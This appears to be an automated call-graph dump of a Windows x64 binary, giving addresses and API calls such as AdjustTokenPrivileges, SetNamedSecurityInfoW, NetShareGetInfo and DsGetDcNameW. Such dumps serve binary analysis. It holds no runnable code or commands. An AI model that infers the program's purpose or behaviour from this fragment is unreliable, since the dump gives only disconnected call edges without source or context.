42670->42696 42671 7ff686857cd9 42697 7ff686833f80 35 API calls 42671->42697 42713 7ff686857d00 ctype 42671->42713 42684 7ff686829910 33 API calls 42672->42684 42698 7ff686833f80 35 API calls 42673->42698 42674 7ff6868577a4 ctype 42681 7ff686857fed 42674->42681 42687 7ff6868579cd 42674->42687 42688 7ff686857857 42674->42688 42700 7ff686857ff3 42674->42700 42675->42666 42675->42689 42726 7ff686859fb0 16 API calls _handle_error 42675->42726 42678 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42677->42678 42678->42681 42682 7ff686857b6d 42679->42682 42683 7ff686857b62 RegCloseKey 42679->42683 42680->42679 42693 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42681->42693 42727 7ff686856970 33 API calls 3 library calls 42682->42727 42683->42682 42695 7ff686857fff 42684->42695 42685->42656 42699 7ff6868576f8 42686->42699 42687->42636 42723 7ff686856970 33 API calls 3 library calls 42688->42723 42689->42664 42689->42666 42689->42671 42704 7ff686857e16 SetNamedSecurityInfoW 42689->42704 42690 7ff686857dcb NetShareGetInfo 42691 7ff686857e06 42690->42691 42692 7ff686857de2 42690->42692 42691->42704 42705 7ff686857e10 NetApiBufferFree 42691->42705 42710 7ff686833f80 35 API calls 42692->42710 42693->42700 42708 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42695->42708 42696->42666 42697->42713 42706 7ff686857d52 42698->42706 42703 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42700->42703 42702 7ff686857b76 42728 7ff686834230 31 API calls 2 library calls 42702->42728 42703->42672 42704->42666 42704->42670 42705->42704 42706->42695 42706->42713 42708->42712 42709 7ff6868578ee ctype 42709->42667 42716 7ff68685793e ctype 42709->42716 42710->42691 42711 7ff686857b80 42729 7ff686834230 31 API calls 2 library calls 42711->42729 42712->42654 42713->42690 42714 7ff686857860 ctype 42714->42658 42714->42709 42714->42712 42716->42677 42721 7ff68685798a ctype 42716->42721 42717 7ff686857b8a 42730 7ff686834230 31 API calls 2 library calls 42717->42730 42719 7ff686857b94 42731 7ff686834230 31 API calls 2 library calls 42719->42731 42721->42662 42722->42674 42723->42714 42724->42669 42725->42675 42726->42689 42727->42702 42728->42711 42729->42717 42730->42719 42731->42662 42732->42651 42733 7ff686843fd8 AdjustTokenPrivileges 42734 7ff68684400a GetLastError 42733->42734 42735 7ff686844023 GetLastError CloseHandle 42733->42735 42734->42735 42736 7ff686844014 CloseHandle 42734->42736 42738 7ff686844037 ctype 42735->42738 42736->42738 42737 7ff68684441e 42741 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42737->42741 42738->42737 42739 7ff686833f80 35 API calls 42738->42739 42740 7ff686844424 42738->42740 42747 7ff6868441d3 ctype 42738->42747 42742 7ff686844105 42739->42742 42743 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42740->42743 42741->42740 42745 7ff686833f80 35 API calls 42742->42745 42746 7ff68684442a 42743->42746 42744 7ff686844314 42748 7ff686844331 42744->42748 42784 7ff68685e4b0 42744->42784 42757 7ff686844135 ctype 42745->42757 42751 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42746->42751 42749 7ff68685e4b0 92 API calls 42747->42749 42753 7ff686844268 42747->42753 42758 7ff686844356 42747->42758 42752 7ff68685e4b0 92 API calls 42748->42752 42756 7ff686844352 42748->42756 42748->42758 42749->42747 42754 7ff686844430 42751->42754 42752->42756 42753->42744 42755 7ff68685e4b0 92 API calls 42753->42755 42753->42758 42755->42753 42756->42758 42760 7ff68684a350 254 API calls 42756->42760 42757->42746 42757->42747 42762 7ff6868443dd 42757->42762 42759 7ff686862180 _handle_error 8 API calls 42758->42759 42761 7ff6868443c0 42759->42761 42760->42758 42763 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42762->42763 42764 7ff6868443e2 42763->42764 42765 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42764->42765 42766 7ff6868443e8 42765->42766 42767 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42766->42767 42768 7ff6868443ee 42767->42768 42769 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42768->42769 42770 7ff6868443f4 42769->42770 42771 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42770->42771 42772 7ff6868443fa 42771->42772 42773 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42772->42773 42774 7ff686844400 42773->42774 42775 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42774->42775 42776 7ff686844406 42775->42776 42777 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42776->42777 42778 7ff68684440c 42777->42778 42779 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42778->42779 42780 7ff686844412 42779->42780 42781 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42780->42781 42782 7ff686844418 42781->42782 42783 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42782->42783 42783->42737 42786 7ff68685e4f6 ctype 42784->42786 42785 7ff68685e50c ConvertStringSidToSidW 42787 7ff68685e51b 42785->42787 42797 7ff68685e53b 42785->42797 42786->42785 42911 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42787->42911 42789 7ff68685e525 LocalFree 42801 7ff68685ebc1 ctype 42789->42801 42792 7ff686862180 _handle_error 8 API calls 42793 7ff68685ebd4 42792->42793 42793->42748 42794 7ff686833f80 35 API calls 42795 7ff68685e74b 42794->42795 42877 7ff686834750 42795->42877 42799 7ff686833f80 35 API calls 42797->42799 42821 7ff68685e6a7 ctype 42797->42821 42844 7ff68685e5d7 ctype 42797->42844 42798 7ff68685e759 ctype 42805 7ff68685ebfa 42798->42805 42806 7ff686860c18 13 API calls 42798->42806 42817 7ff68685e7e9 42798->42817 42811 7ff68685e610 ctype 42799->42811 42800 7ff68685ec18 42802 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42800->42802 42801->42792 42809 7ff68685ec1e 42802->42809 42803 7ff68685ebf4 42808 7ff686829910 33 API calls 42803->42808 42804 7ff68685ebef 42812 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42804->42812 42810 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42805->42810 42813 7ff68685e7b9 42806->42813 42807 7ff68685ec12 42814 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42807->42814 42808->42805 42815 7ff68685ec00 42810->42815 42811->42803 42811->42807 42816 7ff686833f80 35 API calls 42811->42816 42812->42803 42912 7ff686835cf0 70 API calls 42813->42912 42814->42800 42820 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42815->42820 42816->42821 42818 7ff686829520 35 API calls 42817->42818 42841 7ff68685e981 ctype 42817->42841 42822 7ff68685e839 42818->42822 42824 7ff68685ec06 42820->42824 42821->42807 42848 7ff68685f9c0 42821->42848 42825 7ff686829520 35 API calls 42822->42825 42828 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42824->42828 42827 7ff68685e847 DsGetDcNameW 42825->42827 42826 7ff68685e9ef 42830 7ff68685ea1d 42826->42830 42831 7ff68685ea02 42826->42831 42826->42844 42833 7ff68685e89e 42827->42833 42838 7ff68685e912 ctype 42827->42838 42832 7ff68685ec0c 42828->42832 42835 7ff686833f80 35 API calls 42830->42835 42830->42844 42834 7ff68685f3c0 46 API calls 42831->42834 42836 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42832->42836 42840 7ff686833f80 35 API calls 42833->42840 42834->42844 42837 7ff68685ea4c 42835->42837 42836->42807 42842 7ff68685f3c0 46 API calls 42837->42842 42838->42815 42839 7ff686833f80 35 API calls 42838->42839 42838->42841 42839->42841 42843 7ff68685e8bc 42840->42843 42841->42832 42884 7ff68685f3c0 42841->42884 42842->42844 42913 7ff68683eaf0 8 API calls 2 library calls 42843->42913 42844->42800 42844->42801 42844->42804 42844->42807 42844->42824 42844->42832 42846 7ff68685e901 42846->42838 42847 7ff68685e90b NetApiBufferFree 42846->42847 42847->42838 42849 7ff686860c18 13 API calls 42848->42849 42850 7ff68685f9e9 42849->42850 42852 7ff68682c870 70 API calls 42850->42852 42853 7ff68685faa2 42850->42853 42851 7ff686860c18 13 API calls 42855 7ff68685fb3b 42851->42855 42852->42850 42853->42851 42876 7ff68685e706 42853->42876 42854 7ff68682c870 70 API calls 42854->42855 42855->42854 42857 7ff68685fbf0 42855->42857 42856 7ff686860c18 13 API calls 42859 7ff68685fc89 42856->42859 42857->42856 42857->42876 42858 7ff68682c870 70 API calls 42858->42859 42859->42858 42861 7ff68685fd40 42859->42861 42860 7ff686860c18 13 API calls 42862 7ff68685fdd9 42860->42862 42861->42860 42861->42876 42864 7ff68682c870 70 API calls 42862->42864 42865 7ff68685fe90 42862->42865 42863 7ff686860c18 13 API calls 42866 7ff68685ff29 42863->42866 42864->42862 42865->42863 42865->42876 42868 7ff68682c870 70 API calls 42866->42868 42869 7ff68685ffe0 42866->42869 42867 7ff686860c18 13 API calls 42870 7ff686860079 42867->42870 42868->42866 42869->42867 42869->42876 42872 7ff68682c870 70 API calls 42870->42872 42873 7ff686860130 42870->42873 42871 7ff686860c18 13 API calls 42875 7ff6868601c9 42871->42875 42872->42870 42873->42871 42873->42876 42874 7ff68682c870 70 API calls 42874->42875 42875->42874 42875->42876 42876->42794 42878 7ff686833f80 35 API calls 42877->42878 42879 7ff686834791 42878->42879 42914 7ff68686e3a4 42879->42914 42881 7ff6868347e3 ctype 42881->42798 42883 7ff686833f80 35 API calls 42883->42881 42885 7ff68685f3ea LookupAccountNameW GetLastError 42884->42885 42887 7ff68685f469 42885->42887 42888 7ff68685f45e GetLastError 42885->42888 42890 7ff68685f4bb 42887->42890 42891 7ff68685f492 42887->42891 42895 7ff68685f4a4 memcpy_s 42887->42895 42906 7ff68685f61f ctype 42888->42906 42893 7ff6868621d4 std::_Facet_Register 5 API calls 42890->42893 42892 7ff68685f653 Concurrency::cancel_current_task 42891->42892 42894 7ff6868621d4 std::_Facet_Register 5 API calls 42891->42894 42893->42895 42894->42895 42902 7ff68685f5f0 ctype 42895->42902 42939 7ff686835790 35 API calls 3 library calls 42895->42939 42897 7ff68685f4f7 LookupAccountNameW 42898 7ff68685f557 GetLastError 42897->42898 42899 7ff68685f561 42897->42899 42903 7ff68685f5b7 42898->42903 42904 7ff686833f80 35 API calls 42899->42904 42900 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42901 7ff68685f652 42900->42901 42901->42892 42902->42900 42902->42906 42903->42902 42907 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42903->42907 42905 7ff68685f586 42904->42905 42905->42903 42908 7ff68685f590 IsValidSid 42905->42908 42906->42826 42907->42902 42908->42903 42909 7ff68685f59d ctype 42908->42909 42940 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42909->42940 42911->42789 42912->42817 42913->42846 42917 7ff68686e218 42914->42917 42938 7ff68686f264 EnterCriticalSection 42917->42938 42919 7ff68686e244 42920 7ff68686e24c 42919->42920 42922 7ff68686e26f 42919->42922 42921 7ff68686e1f8 _Wcrtomb 14 API calls 42920->42921 42923 7ff68686e251 42921->42923 42924 7ff68686e30c 39 API calls 42922->42924 42925 7ff6868688dc _invalid_parameter_noinfo 31 API calls 42923->42925 42929 7ff68686e277 42924->42929 42926 7ff68686e25d 42925->42926 42927 7ff68686f2b8 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 42926->42927 42928 7ff6868347b7 42927->42928 42928->42881 42928->42883 42929->42926 42930 7ff68686e2b4 42929->42930 42931 7ff68686e2a4 42929->42931 42933 7ff686875174 _Getctype 31 API calls 42930->42933 42932 7ff68686e1f8 _Wcrtomb 14 API calls 42931->42932 42932->42926 42934 7ff68686e2c2 42933->42934 42934->42926 42935 7ff68686e2f5 42934->42935 42936 7ff68686892c _invalid_parameter_noinfo_noreturn 17 API calls 42935->42936 42937 7ff68686e309 42936->42937 42939->42897 42940->42903 42941 7ff68686c2fd 42942 7ff68686c303 42941->42942 42945 7ff68686c309 42941->42945 42943 7ff68686c36a 42942->42943 42942->42945 42968 7ff68686cf6c 31 API calls 2 library calls 42943->42968 42947 7ff68686c38d 42945->42947 42950 7ff68686c32d 42945->42950 42969 7ff68686cda0 32 API calls 2 library calls 42945->42969 42948 7ff686862180 _handle_error 8 API calls 42947->42948 42949 7ff68686c514 42948->42949 42950->42947 42951 7ff68686c46f 42950->42951 42970 7ff68686aeec 63 API calls 42950->42970 42955 7ff68686c492 42951->42955 42971 7ff68686d42c 42951->42971 42954 7ff68686c4d8 42960 7ff68686d280 42954->42960 42955->42954 42978 7ff68686aeec 63 API calls 42955->42978 42961 7ff68686d2a2 42960->42961 42962 7ff68686d331 42960->42962 42961->42962 42963 7ff68686d2ad 42961->42963 42964 7ff68686d42c 63 API calls 42962->42964 42967 7ff68686c4e2 42962->42967 42963->42967 42980 7ff686878a80 25 API calls 2 library calls 42963->42980 42981 7ff6868799bc 42963->42981 42964->42967 42967->42947 42979 7ff68686aeec 63 API calls 42967->42979 42968->42950 42969->42950 42970->42951 42972 7ff68686d462 42971->42972 42975 7ff68686d467 42971->42975 43141 7ff68686e1f8 14 API calls _Wcrtomb 42972->43141 42974 7ff68686d500 42974->42955 42975->42974 42977 7ff6868799bc 63 API calls 42975->42977 43142 7ff68686e1f8 14 API calls _Wcrtomb 42975->43142 42977->42975 42978->42954 42979->42947 42980->42963 42982 7ff686879a06 42981->42982 42991 7ff6868799ed 42981->42991 43008 7ff686879b38 42982->43008 42986 7ff6868799f7 42988 7ff686862180 _handle_error 8 API calls 42986->42988 42987 7ff686879a45 42987->42991 42993 7ff686879b38 31 API calls 42987->42993 42990 7ff686879b25 42988->42990 42989 7ff686879b38 31 API calls 42992 7ff686879a29 42989->42992 42990->42963 42991->42986 43036 7ff68687c394 62 API calls _Wcrtomb 42991->43036 42992->42987 42995 7ff686879b38 31 API calls 42992->42995 42994 7ff686879a6e 42993->42994 42996 7ff686879a97 42994->42996 42998 7ff686879b38 31 API calls 42994->42998 42997 7ff686879a36 42995->42997 42996->42991 42999 7ff686879aad 42996->42999 43000 7ff686879b38 31 API calls 42997->43000 43001 7ff686879a7b 42998->43001 43014 7ff686878da4 42999->43014 43000->42987 43001->42996 43003 7ff686879b38 31 API calls 43001->43003 43004 7ff686879a88 43003->43004 43006 7ff686879b38 31 API calls 43004->43006 43005 7ff686879ac4 43005->42986 43017 7ff6868720f8 43005->43017 43006->42996 43009 7ff686879a0e 43008->43009 43010 7ff686879b41 43008->43010 43009->42987 43009->42989 43037 7ff68686e1f8 14 API calls _Wcrtomb 43010->43037 43012 7ff686879b46 43038 7ff6868688dc 31 API calls _invalid_parameter_noinfo 43012->43038 43039 7ff686878c08 43014->43039 43018 7ff68687c2a8 43017->43018 43019 7ff686872102 43017->43019 43020 7ff686879b38 31 API calls 43018->43020 43019->43005 43021 7ff68687c2c4 43020->43021 43022 7ff68687c2e8 43021->43022 43023 7ff68687c2d0 43021->43023 43025 7ff68687c2f2 43022->43025 43026 7ff68687c2ff 43022->43026 43117 7ff68686e1f8 14 API calls _Wcrtomb 43023->43117 43118 7ff68686e1f8 14 API calls _Wcrtomb 43025->43118 43032 7ff68687c30e 43026->43032 43119 7ff68687c22c 33 API calls 43026->43119 43028 7ff68687c36b 43128 7ff68687c060 59 API calls 43028->43128 43029 7ff68687c2d5 43029->43005 43032->43028 43032->43029 43034 7ff68687c35f 43032->43034 43120 7ff6868801a0 43032->43120 43034->43028 43112 7ff686880648 43034->43112 43036->42986 43037->43012 43038->43009 43040 7ff686878c2b 43039->43040 43041 7ff686878c65 43040->43041 43042 7ff686878c4f 43040->43042 43052 7ff686878c30 43040->43052 43066 7ff68686aff8 43041->43066 43064 7ff68686e1f8 14 API calls _Wcrtomb 43042->43064 43046 7ff686878c54 43065 7ff6868688dc 31 API calls _invalid_parameter_noinfo 43046->43065 43047 7ff686878c81 43074 7ff68687edcc 14 API calls _Wcrtomb 43047->43074 43048 7ff686878caf 43051 7ff686878cb9 43048->43051 43077 7ff68687c480 WideCharToMultiByte 43048->43077 43054 7ff686878d0d memcpy_s 43051->43054 43058 7ff686878cc7 memcpy_s 43051->43058 43052->43005 43053 7ff686878c96 43053->43052 43075 7ff68686e1f8 14 API calls _Wcrtomb 43053->43075 43054->43052 43078 7ff68686e1f8 14 API calls _Wcrtomb 43054->43078 43058->43052 43076 7ff68686e1f8 14 API calls _Wcrtomb 43058->43076 43062 7ff686878d93 43079 7ff6868688dc 31 API calls _invalid_parameter_noinfo 43062->43079 43064->43046 43065->43052 43067 7ff68686b017 43066->43067 43068 7ff68686b01c 43066->43068 43067->43047 43067->43048 43068->43067 43080 7ff686873e64 GetLastError 43068->43080 43070 7ff68686b037 43104 7ff686878db8 16 API calls _Tolower 43070->43104 43072 7ff68686b05a 43105 7ff686878dec 16 API calls _Wcsftime 43072->43105 43074->43053 43075->43052 43076->43052 43078->43062 43079->43052 43081 7ff686873e86 43080->43081 43082 7ff686873e8b 43080->43082 43106 7ff686877e14 6 API calls try_get_function 43081->43106 43086 7ff686873e93 SetLastError 43082->43086 43107 7ff686877e5c 6 API calls try_get_function 43082->43107 43085 7ff686873eae 43085->43086 43088 7ff686874fdc _Tolower 14 API calls 43085->43088 43089 7ff686873f22 43086->43089 43090 7ff686873ec1 43088->43090 43089->43070 43091 7ff686873edf 43090->43091 43092 7ff686873ecf 43090->43092 43109 7ff686877e5c 6 API calls try_get_function 43091->43109 43108 7ff686877e5c 6 API calls try_get_function 43092->43108 43095 7ff686873ed6 43099 7ff686875054 __free_lconv_num 14 API calls 43095->43099 43096 7ff686873ee7 43097 7ff686873efd 43096->43097 43098 7ff686873eeb 43096->43098 43111 7ff686873c14 14 API calls _Tolower 43097->43111 43110 7ff686877e5c 6 API calls try_get_function 43098->43110 43099->43086 43102 7ff686873f05 43103 7ff686875054 __free_lconv_num 14 API calls 43102->43103 43103->43086 43104->43072 43105->43067 43107->43085 43108->43095 43109->43096 43110->43095 43111->43102 43129 7ff686875094 43112->43129 43115 7ff686875054 __free_lconv_num 14 API calls 43116 7ff686880672 43115->43116 43116->43028 43117->43029 43118->43029 43119->43032 43121 7ff6868801a9 43120->43121 43123 7ff6868801b6 43120->43123 43138 7ff68686e1f8 14 API calls _Wcrtomb 43121->43138 43124 7ff6868801ae 43123->43124 43139 7ff68686e1f8 14 API calls _Wcrtomb 43123->43139 43124->43034 43126 7ff6868801ed 43140 7ff6868688dc 31 API calls _invalid_parameter_noinfo 43126->43140 43128->43029 43130 7ff6868750df 43129->43130 43134 7ff6868750a3 _Tolower 43129->43134 43137 7ff68686e1f8 14 API calls _Wcrtomb 43130->43137 43132 7ff6868750c6 HeapAlloc 43133 7ff6868750dd 43132->43133 43132->43134 43133->43115 43134->43130 43134->43132 43136 7ff6868724d0 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 43134->43136 43136->43134 43137->43133 43138->43124 43139->43126 43140->43124 43141->42975 43142->42975 43143 7ff6868622fc 43166 7ff6868624c8 43143->43166 43146 7ff68686231d __scrt_acquire_startup_lock 43149 7ff68686245d 43146->43149 43151 7ff68686233b 43146->43151 43147 7ff686862453 43189 7ff686862e8c 7 API calls 2 library calls 43147->43189 43190 7ff686862e8c 7 API calls 2 library calls 43149->43190 43152 7ff686862360 43151->43152 43157 7ff68686237d __scrt_release_startup_lock 43151->43157 43174 7ff686872e48 43151->43174 43153 7ff686862468 43155 7ff6868623e6 43179 7ff686872df0 43155->43179 43157->43155 43188 7ff68687318c 16 API calls __GSHandlerCheck_EH 43157->43188 43159 7ff6868623eb 43185 7ff686821590 43159->43185 43191 7ff686863118 43166->43191 43169 7ff6868624f7 43193 7ff6868738c0 43169->43193 43172 7ff686862315 43172->43146 43172->43147 43175 7ff686872e7d 43174->43175 43176 7ff686872e97 43174->43176 43175->43176 43210 7ff686821130 43175->43210 43217 7ff6868213f0 CreateMutexExW CreateEventW CreateEventW 43175->43217 43176->43157 43180 7ff686872e15 43179->43180 43181 7ff686872e00 43179->43181 43180->43159 43181->43180 43226 7ff686872ad0 34 API calls __free_lconv_num 43181->43226 43183 7ff686872e1e 43183->43180 43227 7ff686872c90 15 API calls 3 library calls 43183->43227 43228 7ff6868699a4 43185->43228 43187 7ff6868215c4 43188->43155 43189->43149 43190->43153 43192 7ff6868624ea __scrt_dllmain_crt_thread_attach 43191->43192 43192->43169 43192->43172 43194 7ff68687d76c 43193->43194 43195 7ff6868624fc 43194->43195 43198 7ff686878a04 43194->43198 43195->43172 43197 7ff686865020 7 API calls 2 library calls 43195->43197 43197->43172 43209 7ff68686f264 EnterCriticalSection 43198->43209 43200 7ff686878a14 43201 7ff68687d280 32 API calls 43200->43201 43202 7ff686878a1d 43201->43202 43203 7ff686878a2b 43202->43203 43204 7ff686878808 34 API calls 43202->43204 43205 7ff68686f2b8 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 43203->43205 43206 7ff686878a26 43204->43206 43207 7ff686878a37 43205->43207 43208 7ff6868788f8 GetStdHandle GetFileType 43206->43208 43207->43194 43208->43203 43218 7ff6868626c4 43210->43218 43213 7ff686821169 WSAStartup 43214 7ff68682117d 43213->43214 43215 7ff686862180 _handle_error 8 API calls 43214->43215 43216 7ff68682118d 43215->43216 43216->43175 43221 7ff686862688 43218->43221 43220 7ff686821155 43220->43213 43220->43214 43222 7ff6868626a2 43221->43222 43224 7ff68686269b 43221->43224 43225 7ff68687374c 34 API calls 43222->43225 43224->43220 43225->43224 43226->43183 43227->43180 43229 7ff6868699d8 43228->43229 43230 7ff6868699c4 43228->43230 43232 7ff686873e64 _Tolower 16 API calls 43229->43232 43263 7ff68686e1f8 14 API calls _Wcrtomb 43230->43263 43234 7ff6868699dd 43232->43234 43233 7ff6868699c9 43264 7ff6868688dc 31 API calls _invalid_parameter_noinfo 43233->43264 43242 7ff686878294 43234->43242 43237 7ff6868699d4 43237->43187 43238 7ff6868699e6 43239 7ff686875954 _Tolower 16 API calls 43238->43239 43240 7ff6868699eb 43239->43240 43241 7ff686868f90 std::_Locinfo::_Locinfo_ctor 62 API calls 43240->43241 43241->43237 43265 7ff686877998 43242->43265 43245 7ff686877998 try_get_function 5 API calls 43246 7ff6868782d3 43245->43246 43247 7ff686877998 try_get_function 5 API calls 43246->43247 43248 7ff6868782f2 43247->43248 43249 7ff686877998 try_get_function 5 API calls 43248->43249 43250 7ff686878311 43249->43250 43251 7ff686877998 try_get_function 5 API calls 43250->43251 43252 7ff686878330 43251->43252 43253 7ff686877998 try_get_function 5 API calls 43252->43253 43254 7ff68687834f 43253->43254 43255 7ff686877998 try_get_function 5 API calls 43254->43255 43256 7ff68687836e 43255->43256 43257 7ff686877998 try_get_function 5 API calls 43256->43257 43258 7ff68687838d 43257->43258 43259 7ff686877998 try_get_function 5 API calls 43258->43259 43260 7ff6868783ac 43259->43260 43261 7ff686877998 try_get_function 5 API calls 43260->43261 43262 7ff6868783cb 43261->43262 43263->43233 43264->43237 43266 7ff6868779f9 43265->43266 43273 7ff6868779f4 try_get_function 43265->43273 43266->43245 43267 7ff686877adc 43267->43266 43270 7ff686877aea GetProcAddress 43267->43270 43268 7ff686877a28 LoadLibraryExW 43269 7ff686877a49 GetLastError 43268->43269 43268->43273 43269->43273 43271 7ff686877afb 43270->43271 43271->43266 43272 7ff686877ac1 FreeLibrary 43272->43273 43273->43266 43273->43267 43273->43268 43273->43272 43274 7ff686877a83 LoadLibraryExW 43273->43274 43274->43273 43275 7ff686843d1b AdjustTokenPrivileges 43276 7ff686843d66 GetLastError CloseHandle 43275->43276 43277 7ff686843d4d GetLastError 43275->43277 43279 7ff686843d7a ctype 43276->43279 43277->43276 43278 7ff686843d57 CloseHandle 43277->43278 43278->43279 43280 7ff68684440c 43279->43280 43281 7ff686833f80 35 API calls 43279->43281 43284 7ff686844412 43279->43284 43295 7ff686843e78 ctype 43279->43295 43283 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43280->43283 43285 7ff686843e48 43281->43285 43282 7ff686833f80 35 API calls 43286 7ff686843f4a 43282->43286 43283->43284 43287 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43284->43287 43288 7ff686833f80 35 API calls 43285->43288 43289 7ff686833f80 35 API calls 43286->43289 43290 7ff686844418 43287->43290 43288->43295 43291 7ff686843f77 GetCurrentProcess OpenProcessToken 43289->43291 43293 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43290->43293 43292 7ff686843f9a GetLastError 43291->43292 43297 7ff686844037 ctype 43292->43297 43294 7ff68684441e 43293->43294 43296 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43294->43296 43295->43282 43295->43290 43300 7ff6868443dd 43295->43300 43298 7ff686844424 43296->43298 43297->43294 43297->43298 43299 7ff686833f80 35 API calls 43297->43299 43307 7ff6868441d3 ctype 43297->43307 43302 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43298->43302 43301 7ff686844105 43299->43301 43304 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43300->43304 43305 7ff686833f80 35 API calls 43301->43305 43306 7ff68684442a 43302->43306 43303 7ff686844314 43308 7ff686844331 43303->43308 43311 7ff68685e4b0 92 API calls 43303->43311 43309 7ff6868443e2 43304->43309 43321 7ff686844135 ctype 43305->43321 43313 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43306->43313 43310 7ff68685e4b0 92 API calls 43307->43310 43315 7ff686844268 43307->43315 43322 7ff686844356 43307->43322 43314 7ff68685e4b0 92 API calls 43308->43314 43319 7ff686844352 43308->43319 43308->43322 43312 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43309->43312 43310->43307 43311->43308 43316 7ff6868443e8 43312->43316 43317 7ff686844430 43313->43317 43314->43319 43315->43303 43318 7ff68685e4b0 92 API calls 43315->43318 43315->43322 43320 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43316->43320 43318->43315 43319->43322 43325 7ff68684a350 254 API calls 43319->43325 43324 7ff6868443ee 43320->43324 43321->43300 43321->43306 43321->43307 43323 7ff686862180 _handle_error 8 API calls 43322->43323 43326 7ff6868443c0 43323->43326 43327 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43324->43327 43325->43322 43328 7ff6868443f4 43327->43328 43329 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43328->43329 43330 7ff6868443fa 43329->43330 43331 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43330->43331 43332 7ff686844400 43331->43332 43333 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43332->43333 43334 7ff686844406 43333->43334 43335 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43334->43335 43335->43280 43336 7ff68683c780 43337 7ff68683c7a6 43336->43337 43340 7ff68686d5bc 43337->43340 43341 7ff68686d5f7 43340->43341 43342 7ff68686d5e2 43340->43342 43341->43342 43344 7ff68686d5fc 43341->43344 43356 7ff68686e1f8 14 API calls _Wcrtomb 43342->43356 43349 7ff68686a8ac 43344->43349 43345 7ff68686d5e7 43357 7ff6868688dc 31 API calls _invalid_parameter_noinfo 43345->43357 43348 7ff68683c7bc 43358 7ff68686a894 EnterCriticalSection 43349->43358 43351 7ff68686a8c9 43352 7ff68686b1dc 63 API calls 43351->43352 43353 7ff68686a8d2 43352->43353 43354 7ff68686a8a0 LeaveCriticalSection 43353->43354 43355 7ff68686a8dc 43354->43355 43355->43348 43356->43345 43357->43348 43359 7ff686843a5e AdjustTokenPrivileges 43360 7ff686843aa9 GetLastError CloseHandle 43359->43360 43361 7ff686843a90 GetLastError 43359->43361 43363 7ff686843abd ctype 43360->43363 43361->43360 43362 7ff686843a9a CloseHandle 43361->43362 43362->43363 43364 7ff6868443fa 43363->43364 43365 7ff686844400 43363->43365 43366 7ff686833f80 35 API calls 43363->43366 43379 7ff686843bbb ctype 43363->43379 43368 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43364->43368 43371 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43365->43371 43369 7ff686843b8b 43366->43369 43367 7ff686833f80 35 API calls 43370 7ff686843c8d 43367->43370 43368->43365 43373 7ff686833f80 35 API calls 43369->43373 43374 7ff686833f80 35 API calls 43370->43374 43372 7ff686844406 43371->43372 43376 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43372->43376 43373->43379 43375 7ff686843cba GetCurrentProcess OpenProcessToken 43374->43375 43377 7ff686843cdd GetLastError 43375->43377 43378 7ff68684440c 43376->43378 43381 7ff686843d7a ctype 43377->43381 43380 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43378->43380 43379->43367 43379->43372 43385 7ff6868443dd 43379->43385 43382 7ff686844412 43380->43382 43381->43378 43381->43382 43383 7ff686833f80 35 API calls 43381->43383 43400 7ff686843e78 ctype 43381->43400 43388 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43382->43388 43386 7ff686843e48 43383->43386 43384 7ff686833f80 35 API calls 43387 7ff686843f4a 43384->43387 43389 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43385->43389 43390 7ff686833f80 35 API calls 43386->43390 43391 7ff686833f80 35 API calls 43387->43391 43392 7ff686844418 43388->43392 43393 7ff6868443e2 43389->43393 43390->43400 43394 7ff686843f77 GetCurrentProcess OpenProcessToken 43391->43394 43397 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43392->43397 43395 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43393->43395 43396 7ff686843f9a GetLastError 43394->43396 43398 7ff6868443e8 